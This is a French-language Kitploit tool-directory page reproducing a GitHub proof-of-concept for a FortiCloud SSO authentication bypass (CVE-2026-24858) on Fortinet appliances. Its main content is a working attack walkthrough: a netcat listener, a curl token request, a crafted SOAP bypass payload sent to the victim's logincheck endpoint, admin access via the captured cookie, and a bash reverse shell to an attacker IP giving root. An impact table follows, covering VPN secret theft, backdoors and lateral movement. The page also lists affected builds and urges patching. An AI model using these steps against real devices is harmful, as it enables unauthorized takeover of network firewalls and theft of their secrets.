Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass — CVE-2026-24858 FortiCloud Single Sign On (SSO) — une fonctionnalité activée par défaut en usine dès que vous enregistrez un FortiGate/FortiManager/FortiAnalyzer — contient une faille critique de contournement de l'authentification. | Kitploit
Outils/GitHubGitHub/absholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHubabsholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass

CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass

CVE-2026-24858 FortiCloud Single Sign On (SSO) — une fonctionnalité activée par défaut en usine dès que vous enregistrez un FortiGate/FortiManager/FortiAnalyzer — contient une faille critique de contournement de l'authentification.

Voir le dépôt
956il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24858 | Contournement de l'authentification SSO FortiCloud


Résumé exécutif

FortiCloud Single-Sign-On (SSO), une fonctionnalité activée par défaut en usine dès que vous enregistrez un FortiGate/FortiManager/FortiAnalyzer, contient une faille critique de contournement d'authentification.

Un attaquant qui possède n'importe quel compte FortiCloud (gratuit ou payant) peut réutiliser son jeton SSO pour se connecter aux équipements d'autres clients (builds ≤ listés ci-dessous) sans connaître leurs mots de passe.

La post-exploitation permet un accès complet à l'interface graphique admin et un shell root, permettant l'interception du trafic, la falsification du VPN ou un mouvement latéral vers les réseaux internes.

Mettez à niveau immédiatement ou désactivez FortiCloud SSO jusqu'à ce qu'un correctif soit appliqué.


Builds concernés

ProduitFirmware vulnérableCorrectif
FortiOS7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6
FortiManager7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9même majeur.mineur+1
FortiAnalyzermêmes plagesmême

PoC

  1. Machine de l'attaquant
    Écouteur pour le reverse shell :

    root@kitploit:~
    nc -lvnp 4444
    
  2. Obtenir le jeton de l'attaquant (TTL de 15 min)

    root@kitploit:~
    curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
      -H "Content-Type: application/json" \
      -d '{"username":"[email protected]","password":"AttackerPass123"}'
    

    Réponse (extrait) :

    root@kitploit:~
    {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
    

    Copiez la valeur access_token.

  3. Construire la charge utile de contournement
    Enregistrez sous bypass.xml :

    root@kitploit:~
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <authRequest>
          <serialNumber>FGT80ETK21000000</serialNumber>
          <token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
          <action>login</action>
        </authRequest>
      </soapenv:Body>
    </soapenv:Envelope>
    
  4. Envoyer à la victime (tout firmware ≤ tableau ci-dessus)

    root@kitploit:~
    curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
      -H "Content-Type: application/xml" \
      --data @bypass.xml \
      -c cookies.txt
    

    HTTP 200 + Set-Cookie: APSCOOKIE=... → succès.

  5. Parcourir l'interface graphique admin
    Ouvrez un navigateur ou utilisez curl avec le cookie enregistré :

    root@kitploit:~
    curl -k -b cookies.txt https://<VICTIM-IP>/ng/
    

    → Le tableau de bord apparaît, aucun mot de passe demandé.

  6. Shell root (widget CLI)
    Dans l'interface graphique : Dashboard → CLI Console

    root@kitploit:~
    execute bash
    bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
    

    L'écouteur reçoit :

    root@kitploit:~
    root@FGT80ETK21000000:/#
    

Impact

ScénarioRésultat
Admin en lecture seuleExport de la configuration complète (secrets VPN, politiques locales, hachages utilisateurs).
Admin en écritureModification des règles de pare-feu, création d'utilisateurs locaux, désactivation des journaux, implantation de scripts persistants.
Shell rootExtraction de config.dat, récupération des clés HA, pivot vers les sous-réseaux internes, implantation d'un service backdoor.
Mouvement latéralL'équipement devient un point d'appui ; les VLAN et tunnels SSL-VPN étant de confiance → brèche réseau plus profonde.
Exfiltration de donnéesTout le trafic passe par le FortiGate → proxy transparent + injection de certificats.
Télécharger l’outil